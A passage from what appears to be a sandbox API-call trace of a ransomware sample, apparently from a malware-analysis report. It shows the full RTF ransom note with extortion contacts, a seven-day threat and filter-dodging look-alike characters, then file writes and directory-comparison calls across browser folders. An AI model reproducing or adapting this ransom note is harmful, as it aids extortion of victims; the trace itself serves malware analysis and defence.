\\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0278.944] WriteFile (in: hFile=0x2c8, lpBuffer=0x1f4b618*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4b618*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.944] CloseHandle (hObject=0x2c8) returned 1 [0278.944] Sleep (dwMilliseconds=0x3e8) [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount2=130) returned 1 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount2=130) returned 1 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount2=135) returned 1 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount2=135) returned 3 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount2=130) returned 1 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount2=130) returned 1 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ms\\", cchCount2=130) returned 1 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount2=132) returned 3 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount2=132) returned 1 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount2=132) returned 1 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\fonts\\", cchCount2=45) returned 3 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\fonts\\", cchCount2=45) returned 3 [0280.250] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount2=130) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount2=130) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount2=130) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\fonts\\", cchCount1=45, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\fonts\\", cchCount1=45, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\", cchCount2=130) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\fonts\\", cchCount1=45, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\", cchCount2=130) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\", cchCount2=130) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\", cchCount2=130) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount2=128) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount2=128) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount2=128) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount2=134) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\", cchCount1=135, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount2=134) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\", cchCount1=128, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount2=134) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\", cchCount2=134) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\vi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount2=131) returned 1 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\", cchCount2=131) returned 3 [0280.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 